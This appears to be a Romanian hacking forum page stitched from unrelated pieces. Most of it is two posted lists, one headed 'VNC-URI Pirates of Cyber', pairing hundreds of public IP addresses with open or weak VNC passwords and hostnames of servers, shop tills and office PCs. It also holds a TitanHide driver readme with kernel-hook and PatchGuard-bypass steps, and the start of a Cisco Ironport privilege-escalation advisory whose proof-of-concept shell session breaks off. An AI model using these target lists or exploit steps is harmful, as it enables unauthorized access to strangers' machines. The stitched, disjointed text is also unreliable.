Search the Community

M-am gandit sa mai ofer si eu ceva comunitati,ca tot am cerut pana acum

213.221.231.148:5900-null-[VNC] 49.212.222.41:5900-null-[katuyu@www33027ue] 222.74.224.141:5900-micros-[NSFOCUS SAS-H] 222.74.224.140:5900-micros-[NSFOCUS SAS-H] 222.74.224.142:5900-micros-[NSFOCUS SAS-H] 222.106.61.196:5900-null-[None] 222.106.42.14:5900-null-[None] 222.106.83.172:5900-null-[None] 222.106.42.13:5900-null-[None] 222.105.233.119:5900-null-[T4A] 222.109.62.214:5900-null-[: ] 222.110.182.146:5900-null-[oracle@ufit.tson.co.kr] 222.112.99.199:5900-null-[hadoop@hadoopmaster01.dunamis] 222.122.217.212:5900-null-[QEMU (i-2-4980-VM)] 222.122.217.138:5900-null-[QEMU (i-2-4979-VM)] 222.122.217.185:5900-null-[QEMU (r-4977-VM)] 222.122.253.178:5900-null-[x11] 222.124.215.99:5900-null-[admin_cipta_karya@server] 222.124.28.189:5900-null-[QEMU (instance-0000012a)] 222.126.232.254:5900-null-[x11] 222.127.128.91:5900-null-[None] 222.126.246.213:5900-null-[x11] 222.126.233.76:5900-null-[x11] 222.122.148.66:5900-null-[None] 222.150.216.53:5900-null-[Device 10001] 222.154.97.132:5900-null-[youf3@NAS] 222.165.168.97:5900-null-[None] 222.164.209.61:5900-null-[rick@lucht01] 222.171.171.5:5900-null-[QEMU (?????_191ff096-e1fc-4c16-b692-c453e8e16d61)] 222.171.171.4:5900-null-[QEMU (????????_ddd131db-c51b-4e11-8d17-bca7da34a041)] 222.180.149.236:5900-null-[QEMU (????-1_411d3d95-4d3d-4138-ba32-8d30759a5f0c)] 222.172.221.22:5900-null-[None] 222.188.198.170:5900-null-[20120821-1658] 222.190.107.203:5900-null-[DCSY-AD] 222.201.132.12:5900-null-[QEMU (instance-00000001)] 222.201.132.13:5900-null-[QEMU (instance-00000007)] 222.200.123.237:5900-null-[reyzar@6cae09.gdut.reyzar.net] 222.200.123.234:5900-null-[reyzar@6cae06.gdut.reyzar.net] 222.200.123.238:5900-null-[reyzar@6cae10.gdut.reyzar.net] 222.205.111.236:5900-null-[None] 222.211.74.42:5900-null-[None] 222.222.108.246:5900-null-[None] 222.222.32.68:5900-null-[None] 222.236.31.230:5900-null-[Device 0] 222.252.25.170:5900-null-[None] 222.255.221.157:5900-micros-[HMI WebServer] 222.36.0.242:5900-null-[tjtthlw@localhost.localdomain] 222.42.245.41:5900-null-[QEMU] 222.255.29.27:5900-null-[None] 222.36.0.246:5900-null-[None] 222.73.136.95:5900-null-[QEMU (instance-00000020)] 222.73.22.8:5900-null-[QEMU (S003592)] 222.76.53.65:5900-null-[WIN-04071046] 222.74.224.140:5900-micros-[NSFOCUS SAS-H] 222.74.224.142:5900-micros-[NSFOCUS SAS-H] 222.80.155.72:5900-null-[2003SERVER] 222.80.184.22:5900-null-[LibVNCServer] 222.77.74.5:5900-null-[QEMU (instance-00000015)] 222.74.224.141:5900-micros-[NSFOCUS SAS-H] 222.82.21.195:5900-null-[1RY9ODIUXNLU1UT] 222.85.16.11:5900-null-[a3] 222.85.16.130:5900-null-[None] 222.85.16.138:5900-null-[None] 222.85.16.114:5900-null-[None] 222.85.16.112:5900-null-[None] 222.85.16.211:5900-null-[x29] 222.85.16.101:5900-null-[None] 222.85.16.179:5900-null-[a59] 222.85.16.217:5900-null-[a12] 222.85.16.189:5900-null-[None] 222.85.16.137:5900-null-[b19] 222.85.16.172:5900-null-[None] 222.85.16.140:5900-null-[None] 222.85.16.170:5900-null-[None] 222.85.16.212:5900-null-[None] 222.85.16.151:5900-null-[None] 222.85.16.56:5900-null-[None] 222.85.16.190:5900-null-[x34] 222.85.16.145:5900-null-[None] 222.85.16.127:5900-null-[a38] 222.85.16.236:5900-null-[a88] 222.85.16.148:5900-null-[None] 222.85.16.12:5900-null-[a13] 222.85.16.142:5900-null-[a32] 222.85.16.171:5900-null-[x93] 222.85.16.146:5900-null-[None] 222.85.16.149:5900-null-[None] 222.85.16.77:5900-null-[x82] 222.85.16.124:5900-null-[None] 222.85.90.196:5900-null-[LibVNCServer] 222.85.16.187:5900-null-[None] 222.85.16.188:5900-null-[x43] 222.85.16.98:5900-null-[None] 222.85.16.220:5900-null-[x35] 222.85.16.49:5900-null-[x60] 222.85.16.201:5900-null-[b59] 222.85.16.42:5900-null-[None] 222.85.16.17:5900-null-[b70] 222.85.16.160:5900-null-[a73] 222.85.16.181:5900-null-[None] 222.85.16.245:5900-null-[a94] 222.85.16.62:5900-null-[None] 222.85.16.125:5900-null-[None] 222.85.16.81:5900-null-[None] 222.85.16.46:5900-null-[None] 222.85.16.253:5900-null-[None] 222.85.16.205:5900-null-[None] 222.85.16.27:5900-null-[None] 222.85.16.64:5900-null-[b27] 222.85.16.223:5900-null-[None] 222.85.16.100:5900-null-[None] 222.85.16.19:5900-null-[None] 222.85.16.3:5900-null-[b32] 222.85.16.174:5900-null-[None] 222.85.16.248:5900-null-[None] 222.85.16.34:5900-null-[None] 222.85.16.35:5900-null-[None] 222.85.16.66:5900-null-[a18] 222.85.16.176:5900-null-[a101] 222.85.16.10:5900-null-[b99] 222.85.16.72:5900-null-[x38] 222.85.16.238:5900-null-[None] 222.85.16.93:5900-null-[None] 222.85.16.175:5900-null-[x46] 222.85.16.38:5900-null-[a50] 222.85.16.5:5900-null-[None] 222.85.16.169:5900-null-[None] 222.85.16.9:5900-null-[None] 222.85.16.136:5900-null-[a41] 222.85.16.84:5900-null-[x12] 222.85.16.83:5900-null-[None] 222.85.16.168:5900-null-[None] 222.85.16.75:5900-null-[None] 222.85.16.153:5900-null-[x49] 222.85.16.193:5900-null-[None] 222.85.16.241:5900-null-[a99] 222.85.16.126:5900-null-[None] 222.85.16.87:5900-null-[None] 222.85.16.210:5900-null-[None] 222.85.16.88:5900-null-[None] 222.85.16.224:5900-null-[b44] 222.85.16.102:5900-null-[None] 222.85.16.69:5900-null-[None] 222.85.16.57:5900-null-[None] 222.85.16.82:5900-null-[None] 222.85.16.158:5900-null-[None] 222.85.16.203:5900-null-[b31] 222.85.16.244:5900-null-[None] 222.85.16.74:5900-null-[None] 222.85.16.20:5900-null-[b46] 222.85.16.85:5900-null-[b35] 222.85.16.58:5900-null-[b11] 222.85.16.97:5900-null-[None] 222.85.16.99:5900-null-[x41] 222.85.16.65:5900-null-[None] 222.85.16.52:5900-null-[a28] 222.85.16.225:5900-null-[a80] 222.85.16.67:5900-null-[None] 222.85.16.22:5900-null-[None] 222.85.16.227:5900-null-[b63] 222.85.16.39:5900-null-[None] 222.85.16.94:5900-null-[x89] 222.85.16.246:5900-null-[None] 222.85.16.157:5900-null-[b94] 222.85.16.54:5900-null-[b45] 222.85.16.182:5900-null-[None] 222.85.16.197:5900-null-[b82] 222.85.16.186:5900-null-[b83] 222.85.16.29:5900-null-[None] 222.85.16.63:5900-null-[a97] 222.85.16.229:5900-null-[b2] 222.85.16.139:5900-null-[None] 222.85.16.250:5900-null-[None] 222.85.16.143:5900-null-[None] 222.85.16.89:5900-null-[None] 222.93.218.217:5900-null-[None] 222.95.130.48:5900-null-[OJDPG4G8ZQ4F40L] 222.103.210.64:5900-12345678-[None] 222.103.210.71:5900-12345678-[pc071] 222.103.210.72:5900-12345678-[pc072] 222.103.210.44:5900-12345678-[pc044] 222.103.210.47:5900-12345678-[pc047] 222.103.210.45:5900-12345678-[pc045] 222.103.210.46:5900-12345678-[pc046] 222.103.210.40:5900-12345678-[pc040] 222.108.214.106:5900-12345678-[XP-201409131002] 222.124.159.134:5900-12345678-[disnakertrans] 222.182.244.226:5900-12345678-[2013-20140828IR] 222.236.46.117:5900-12345678-[adt-count ( 222.236.46.117 ) - service mode] 222.73.136.251:5900-null-[QEMU (instance-00000021)] 222.77.72.98:5900-null-[LAOM-0000000] 222.85.16.166:5900-null-[None] 222.85.16.132:5900-null-[None] 222.85.16.60:5900-null-[None] 222.154.228.221:5900-password-[botany ( 10.1.1.5 ) - service mode] 222.229.216.116:5900-password-[homehands ( 192.168.200.132, 192.168.100.200, 192.168.1.200 )] 222.42.150.35:5900-password-[xpe00f1f30c3f92] 222.111.10.170:5900-1212-[host ( 222.111.10.170, 192.168.0.101 ) - service mode] 222.98.109.233:5900-1212-[gate ( 222.98.109.233, 169.254.134.254 )] 222.99.112.146:5900-1212-[iamage ( 222.99.112.146 ) - service mode] 222.99.112.145:5900-1212-[gate ( 222.99.112.145 ) - service mode] 222.107.103.33:5900-manager-[pc_shop418 ( 222.107.103.33 ) - service mode] 222.85.16.198:5900-null-[None] 223.153.105.29:5900-null-[SHOP6128] 223.147.89.253:5900-null-[None] 223.17.243.177:5900-null-[visa ( 223.17.243.177, 192.168.0.7 ) - service mode] 223.203.199.120:5900-null-[QEMU (centos-6.5-network1)] 223.203.212.23:5900-null-[QEMU (instance-00000009)] 223.203.212.49:5900-null-[QEMU (instance-00000009)] 223.204.90.160:5900-null-[T10A] 223.204.165.102:5900-null-[OFFICE01] 223.205.105.7:5900-null-[perfect@localhost.localdomain] 223.27.252.141:5900-null-[None] 223.27.241.188:5900-null-[None] 223.30.150.233:5900-null-[openfir@chat] 223.30.244.2:5900-null-[None] 223.30.236.74:5900-null-[None] 223.30.64.67:5900-null-[None] 223.197.208.36:5900-12345678-[sc096a ( 10.54.96.11 ) - service mode] 223.205.229.13:5900-12345678-[ADMINIST-20E326] 223.204.146.2:5900-12345678-[pc2013071818how ( 192.168.1.253 ) - service mode] 223.30.150.242:5900-null-[nishant@email1] 223.246.224.241:5900-12345678-[heart] 223.204.187.138:5900-null-[None] 223.197.215.157:5900-password-[None] 223.30.2.179:5900-password-[APPSERVER] 223.205.91.174:5900-support-[TM016-SERVER]

Overview TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy. Features ProcessDebugFlags (NtQueryInformationProcess) ProcessDebugPort (NtQueryInformationProcess) ProcessDebugObjectHandle (NtQueryInformationProcess) DebugObject (NtQueryObject) SystemKernelDebuggerInformation (NtQuerySystemInformation) NtClose (STATUS_INVALID_HANDLE exception) ThreadHideFromDebugger (NtSetInformationThread) Protect DRx (HW BPs) (NtSetContextThread) Test environments Windows 7 x64 & x86 (SP1) Windows XP x86 (SP3) Windows XP x64 (SP1) Compiling Install Visual Studio 2013 (Express Edition untested). Install the WDK. Open TitanHide.sln and hit compile! Installation Method 1 Copy TitanHide.sys to %systemroot%\system32\drivers. Start ServiceManager.exe (available on the download page). Delete the old service (when present). Install a new service (specify the full path to TitanHide.sys). Start the service you just created. Use TitanHideGUI.exe to set hide options for a PID. Installation Method 2 Copy TitanHide.sys to %systemroot%\system32\drivers. Run the command sc create TitanHide binPath=%systemroot%\system32\drivers\TitanHide.sys type=kernel to create the TitanHide service. Run the command sc start TitanHide to start the TitanHide service. Run the command sc query TitanHide to check if TitanHide is running. Testsigning & PatchGuard A simple way to 'bypass' PatchGuard on x64 systems is by enabling a local kernel debugger. This can be done by executing the following commands in an Administrator Console: bcdedit /set testsigning on bcdedit /debug on bcdedit /dbgsettings local /noumex In addition to the commands above you need to set BreakOnSysRq if you want to use the PrntScr button. Read this article for more information. You can also import BreakOnSysRq.reg to automatically fix this problem. Remarks When using x64_dbg, you can use the TitanHide plugin (available on the download page). When using EsetNod32 AV, disable "Realtime File Protection", to prevent a BSOD when starting TitanHide. You can re-enable it right afterwards Download https://bitbucket.org/mrexodia/titanhide/downloads

VNC-URI Pirates of Cyber --------------------------------------------------------------------- 81.94.239.68:5900-null-[Xen-nigs.webplace.lv] 46.109.212.76:5900-null-[till11:0] 46.109.136.207:5900-null-[till1:0] 78.84.192.178:5900-null-[till1:0] 78.84.24.106:5900-null-[till1:0] 80.250.58.140:5900-12345-[None] 80.70.22.202:5900-123456-[a55 ( 192.168.210.18 )] 77.38.208.224:5900-password-[None] 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 5.9.136.250:5900-null-[None] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.136.247:5900-null-[None] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.9.69.146:5900-null-[None] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.2.9.86:5900-1234-[x0vncserver] ------------------------------------------------------------ 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.69.146:5900-null-[None] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.136.250:5900-null-[None] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.30.34.78:5900-null-[None] 5.30.18.129:5900-null-[None] 5.30.20.175:5900-null-[None] 5.30.18.209:5900-null-[None] 5.30.17.196:5900-null-[None] 5.30.40.140:5900-null-[None] 5.39.233.205:5900-null-[x11] 5.38.81.16:5900-null-[root's x11 desktop (M20:0)] 5.28.90.135:5900-null-[None] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.136.247:5900-null-[None] 5.19.173.130:5900-123-[MorSer] 5.2.9.86:5900-1234-[x0vncserver] 5.11.219.75:5900-123456-[WindowsCE] 5.36.212.195:5900-12345678-[OMNPB750] 5.9.5.68:5900-null-[QEMU (vm01)] 5.9.14.180:5900-null-[QEMU (winxp32eng)] 5.9.30.203:5900-null-[QEMU (instance-00000012)] 5.9.30.204:5900-null-[QEMU (instance-00000012)] 5.9.39.51:5900-null-[QEMU (W2k3s)] 5.9.61.169:5900-null-[QEMU (win7prtg)] 5.9.63.110:5900-null-[QEMU (kerio1)] 5.9.63.228:5900-null-[QEMU (kerio1)] 5.9.69.146:5900-null-[QEMU (mail)] 5.9.69.144:5900-null-[QEMU (instance-00000013)] 5.9.81.168:5900-null-[QEMU (DNS-Server)] 5.9.109.114:5900-null-[QEMU (instance-00000235)] 5.9.109.112:5900-null-[QEMU (instance-0000017f)] 5.9.122.170:5900-null-[QEMU (kerio1)] 5.9.136.164:5900-null-[QEMU (vm100)] 5.9.136.247:5900-null-[None] 5.9.136.250:5900-null-[None] 5.9.150.80:5900-null-[XenServer Virtual Terminal] 5.9.154.175:5900-null-[QEMU (dev.cloudm)] 5.9.218.217:5900-null-[QEMU (instance-00000012)] 5.2.9.229:5900-null-[ay5:0] 5.10.88.171:5900-null-[QEMU (instance-0000001f)] 5.30.20.175:5900-null-[None] 5.30.17.196:5900-null-[None] 5.30.18.209:5900-null-[None] 5.30.40.140:5900-null-[None] 5.30.18.129:5900-null-[None] 5.39.233.205:5900-null-[x11] 79.4.85.88:5900-null-[nobody's TeamLinux-Vnc desktop (server.cedab.net:1)] 79.10.168.226:5900-null-[myGekko VNC] 79.16.102.77:5900-null-[Qt for Embedded Linux VNC Server] 79.18.41.139:5900-null-[WCE301238004] 79.16.96.62:5900-null-[bJE-CP1:0.0] 79.16.22.133:5900-1-[x0vncserver] 79.17.255.33:5900-1-[None] 79.28.48.20:5900-null-[gw-611:0] 79.31.103.60:5900-null-[bJE-CP1:0.0] 79.31.110.67:5900-null-[myGekko VNC] 79.39.113.106:5900-null-[dvadmin@ServerPaghe] 79.39.152.163:5900-null-[vmserver@vmserver2012] 79.40.105.208:5900-null-[myGekko VNC] 79.43.161.86:5900-null-[PC-GIUSEPPE] 79.48.105.4:5900-null-[TKC] 79.51.173.186:5900-null-[MI_01383B] 79.54.60.182:5900-null-[servone@servone] 79.43.110.178:5900-null-[LvisCasa (192.168.1.88)] 79.48.10.1:5900-null-[None] 79.59.197.211:5900-null-[gw-140:0] 79.29.25.10:5900-null-[None] 79.78.23.60:5900-null-[PDM1] 79.79.99.89:5900-null-[None] 79.97.173.107:5900-null-[uBUNTUVM01:0] 79.99.68.155:5900-null-[x11] 79.98.213.182:5900-null-[QEMU (Inga-srv)] 79.101.104.54:5900-null-[None] 79.102.131.118:5900-null-[geten@HTPC] 79.102.130.51:5900-null-[None] 79.111.160.99:5900-null-[None] 79.108.75.135:5900-null-[joseca@iCenter] 79.120.76.215:5900-null-[QEMU (Puppet)] 79.97.14.244:5900-null-[None] 79.97.3.140:5900-null-[None] 79.97.38.37:5900-null-[None] 79.97.114.165:5900-null-[None] 79.124.31.10:5900-null-[QEMU (windows)] 79.114.36.219:5900-null-[mihai@debian] 79.121.87.28:5900-null-[None] 79.125.52.165:5900-null-[None] 79.127.99.70:5900-null-[qazvin@qazvin-P55A-UD3P] 79.127.124.98:5900-null-[LibVNCServer] 79.129.26.183:5900-1-[emileonsrv ( 192.168.1.30, 169.254.95.120 )] 79.129.56.142:5900-1-[ionianstarsrv ( 192.168.2.10 )] 79.132.172.3:5900-1-[None] 79.138.40.134:5900-null-[None] 79.138.58.103:5900-null-[None] 79.135.35.195:5900-null-[sERVER1] 79.143.179.236:5900-null-[QEMU (static-farmmania)] 79.143.161.228:5900-null-[tuco@dnevna] 79.147.177.183:5900-null-[sERVIDOR] 79.148.120.220:5900-null-[None] 79.148.124.146:5900-null-[administrador@srv6] 79.148.187.129:5900-null-[Device 10001] 79.140.198.77:5900-null-[None] 79.155.25.159:5900-null-[QEMU] 79.154.197.110:5900-null-[LVIS-3E100 (192.168.1.252)] 79.156.165.29:5900-null-[root's x11 desktop (olostsrv1:1)] 79.158.176.235:5900-null-[QEMU] 79.161.99.16:5900-null-[ofalt@ofalt-linux01] 79.159.83.195:5900-null-[Device 10001] 79.170.44.61:5900-null-[QEMU (wwwdev)] 79.175.181.14:5900-null-[None] 79.170.166.158:5900-1-[krylova ( 192.168.0.99 ) - service mode] 79.188.192.58:5900-null-[QEMU] 79.188.127.226:5900-null-[pos@kasa] 79.186.175.177:5900-null-[None] 79.182.216.219:5900-null-[None] 79.189.101.242:5900-null-[serwis@kasa] 79.195.254.218:5900-null-[myGekko VNC] 79.192.207.230:5900-null-[WindowsCE] 79.200.35.238:5900-null-[T-PC] 79.188.89.142:5900-1-[None] 79.208.152.189:5900-null-[bJE-CP1:0.0] 79.206.124.26:5900-null-[myGekko VNC] 79.193.212.160:5900-null-[x11] 79.207.140.136:5900-1-[None] 79.222.194.126:5900-null-[raiserback@Debian-zotac] 79.223.110.17:5900-null-[None] 79.221.220.167:5900-null-[myGekko VNC] 79.215.62.164:5900-null-[None] 5.9.109.113:5900-null-[QEMU (instance-00000234)] 5.9.115.247:5900-null-[QEMU (whost)] 5.9.115.10:5900-null-[QEMU (iiko-srv2)] 79.54.24.67:5900-null-[fark@Palantir] 79.59.91.226:5900-null-[QEMU (Router)] 79.77.143.42:5900-12-[bACKOFFICE] 79.78.18.100:5900-12-[bACKOFFICE] 79.144.122.145:5900-null-[guifi@guifi-desktop] 79.177.109.85:5900-null-[parents.boxen.shmarya.net:0] 5.19.173.130:5900-123-[MorSer] 79.105.235.71:5900-123-[videopc ( 192.168.1.15 ) - application mode] 79.113.20.229:5900-123-[None] 79.129.59.124:5900-123-[c-nario-msg ( 192.168.0.10 )] 79.142.87.86:5900-123-[None] 79.173.85.134:5900-123-[server ( 192.168.0.1, 10.38.114.11 ) - service mode] 79.186.78.16:5900-123-[NARZEDZIAK-SRV] 79.188.38.74:5900-123-[magazyn508 ( 79.188.38.74, 10.10.44.233 ) - service mode] 79.199.87.35:5900-123-[None] 79.201.168.85:5900-123-[bioenergie-pc ( 192.168.19.2 ) - service mode] 79.227.138.157:5900-123-[oem-ugm0p5m1msx ( 192.168.1.241 )] 5.2.9.86:5900-1234-[x0vncserver] 79.13.199.27:5900-1234-[brain] 79.38.220.98:5900-1234-[x0vncserver] 79.59.157.27:5900-1234-[x0vncserver] 79.59.237.197:5900-1234-[sERVERSTUDIO5] 79.45.144.227:5900-1234-[TKC] 79.109.156.69:5900-1234-[tpv ( 192.168.1.100 ) - service mode] 79.118.236.131:5900-1234-[test-pc ( 192.168.0.120 ) - service mode] 79.114.57.182:5900-1234-[None] 79.129.27.71:5900-1234-[sb08office ( 192.168.108.10, 25.38.50.91 )] 79.129.114.158:5900-1234-[sbsrv01 ( 192.168.101.10, 25.141.43.240 ) - service mode] 79.129.115.27:5900-1234-[grammateia ( 192.168.0.110 )] 79.129.120.79:5900-1234-[2003-srv ( 192.168.0.10 )] 79.147.158.119:5900-1234-[servidor-hp] 79.148.240.21:5900-1234-[sF-ISA11] 79.168.10.84:5900-1234-[sBSTALSERVER] 79.187.8.90:5900-1234-[bJE-CP1:0.0] 79.187.155.118:5900-1234-[kasa ( 192.168.1.100 ) - service mode] 79.184.105.171:5900-1234-[None] 79.188.16.86:5900-1234-[kasa ( 192.168.1.101 ) - service mode] 79.188.148.234:5900-1234-[ksiegowosc-srw ( 192.168.1.100 )] 79.188.188.91:5900-1234-[serwer4043 ( 192.168.0.31 )] 79.208.3.24:5900-1234-[bJE-CP1:0.0] 79.226.164.160:5900-1234-[system-v1230 ( 192.168.178.29 )] 79.40.250.61:5900-12345-[serverswht ( 192.168.18.2 )] 79.61.0.2:5900-12345-[x0vncserver] 79.129.36.239:5900-12345-[sb14srv ( 192.168.114.10, 25.167.215.104 ) - application mode] 79.145.194.46:5900-12345-[server1 ( 192.168.1.200 )] 79.136.249.180:5900-12345-[None] 79.151.233.183:5900-12345-[mirnito ( 192.168.1.11 ) - application mode] 79.176.113.22:5900-12345-[tamipeleg-pc ( 10.0.0.2 ) - service mode] 79.186.202.200:5900-12345-[ora-srv ( 10.10.10.250, 192.168.1.200 ) - service mode] 79.184.98.224:5900-12345-[None] 79.187.168.138:5900-12345-[None] 79.225.81.27:5900-12345-[x510 ( 192.168.0.250 ) - service mode] 5.11.219.75:5900-123456-[WindowsCE] 79.39.185.154:5900-123456-[PC_SPARTACO] 79.60.243.58:5900-123456-[brain ( 192.168.1.100 ) - application mode] 79.129.15.6:5900-123456-[None] 79.129.17.146:5900-123456-[marinos ( 192.168.1.56 ) - application mode] 79.129.96.247:5900-123456-[user-think1 ( 192.168.1.10 ) - service mode] 79.165.234.221:5900-123456-[adminpc ( 192.168.0.8 )] 79.152.132.110:5900-123456-[None] 79.184.46.5:5900-123456-[pcmumariusza ( 192.168.1.2 ) - service mode] 79.188.45.122:5900-123456-[None] 79.188.45.123:5900-123456-[None] 79.188.45.120:5900-123456-[None] 79.188.45.121:5900-123456-[None] 79.189.162.64:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.66:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.67:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.71:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.69:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.68:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.70:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.189.162.65:5900-123456-[biuro ( 10.0.0.13 ) - service mode] 79.205.121.232:5900-123456-[server ( 192.168.1.5, 192.168.10.200, 192.168.130.21, 169.254.136.1 )] 5.36.212.195:5900-12345678-[OMNPB750] 79.23.47.84:5900-12345678-[MacMini] 79.36.11.85:5900-12345678-[DVR [000322164273]] 79.58.3.192:5900-12345678-[server] 79.59.5.138:5900-12345678-[server ( 192.168.1.239 ) - service mode] 79.104.30.154:5900-12345678-[None] 79.142.144.242:5900-12345678-[sever-rs] 79.148.121.184:5900-12345678-[mercur ( 192.168.1.2, 25.106.139.161 ) - service mode] 79.170.254.19:5900-12345678-[mdm] 79.190.51.18:5900-12345678-[ksiegowosc ( 192.168.1.30 ) - service mode] 79.131.68.135:5900-123456789-[deiterminal ( 192.168.1.10 ) - service mode] 79.205.217.126:5900-123456789-[trattoria-pc ( 192.168.2.90, 192.168.10.90 ) - service mode] 79.50.246.50:5900-87654321-[Mac mini di Silvano] 79.54.29.199:5900-1111-[Globe] 79.148.234.18:5900-1111-[stbvision] 5.40.37.52:5900-11111-[edomo ( 192.168.0.250 )] 5.40.37.52:5900-11111-[edomo ( 192.168.0.250 )] 79.214.188.96:5900-111-[klimperland-bs1 ( 192.168.178.26 )] 79.45.108.156:5900-admin-[bJE-CP1:0.0] 79.136.180.3:5900-admin-[microsof-ae69c3 ( 79.136.180.3 )] 79.187.183.86:5900-admin-[tescocctv ( 192.168.1.10 ) - application mode] 79.204.220.80:5900-admin-[bJE-CP1:0.0] 79.206.245.136:5900-admin-[bJE-CP1:0.0] 79.225.0.99:5900-admin-[bJE-CP1:0.0] 79.14.56.196:5900-password-[matteo-1000he ( 192.168.1.204 ) - service mode] 79.13.120.57:5900-password-[None] 79.184.31.216:5900-admin12-[None] 79.119.123.53:5900-parola-[oro] 79.148.179.112:5900-2000-[scargo-server ( 192.168.1.2, 172.16.1.21 )] 79.222.146.89:5900-root-[master] 79.14.180.155:5900-personal computer-[lt01 ( 192.168.1.13 )] 5.12.18.117:5900-steaua-[mamaie ( 10.100.101.10 )] 79.190.106.116:5900-pula-[None] 79.94.171.223:5900-test-[None]

https://cloud.google.com/

/* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) 